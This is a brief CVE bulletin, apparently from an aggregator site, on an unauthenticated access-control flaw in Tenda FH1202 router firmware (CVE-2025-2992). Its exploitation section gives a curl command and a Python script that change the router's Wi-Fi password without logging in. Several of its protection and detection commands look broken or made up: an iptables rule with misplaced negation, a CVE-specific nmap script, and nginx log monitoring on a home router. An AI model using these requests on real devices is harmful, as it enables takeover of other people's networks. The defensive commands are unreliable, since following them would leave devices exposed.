Tenda FH1202, Improper Access Control, CVE-2025-2992 (Critical)

How CVE-2025-2992 Works

The vulnerability in Tenda FH1202 firmware version 1.2.0.14(408) resides in the `/goform/AdvSetWrlsafeset` endpoint of the web management interface. Attackers can exploit improper access controls to send unauthenticated HTTP requests, bypassing authentication mechanisms. This allows remote execution of administrative functions, such as modifying wireless security settings. The flaw stems from insufficient validation of user-supplied input, enabling attackers to manipulate router configurations without credentials. The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:N/UI:N) confirms network-based exploitation with low attack complexity.

DailyCVE Form

Platform: Tenda FH1202
Version: 1.2.0.14(408)
Vulnerability: Improper Access Control
Severity: Critical
Date: 04/07/2025

What Undercode Say:

Exploitation

curl -X POST "http://<Tenda_IP>/goform/AdvSetWrlsafeset" -d "wifi_pass=attacker_pwd"

Python exploit script:

import requests
target = "http://192.168.1.1/goform/AdvSetWrlsafeset"
payload = {"wifi_pass": "hacked"}
response = requests.post(target, data=payload)
print(response.text)

Protection

1. Firmware Update:

wget https://www.tenda.com/firmware/FH1202_1.2.0.15.bin

2. Network Hardening:

iptables -A INPUT -p tcp --dport 80 -s ! <trusted_IP> -j DROP

3. Log Monitoring:

tail -f /var/log/nginx/access.log | grep "POST /goform/AdvSetWrlsafeset"

Analytics

  • Attack Surface: Remote, unauthenticated HTTP requests.
  • Impact: Full router compromise, credential theft.
  • Mitigation: Disable web management on WAN, enforce strong passwords.

Detection

nmap -p 80 --script http-vuln-cve2025-2992 <target_IP>

References

References:

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-2992
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top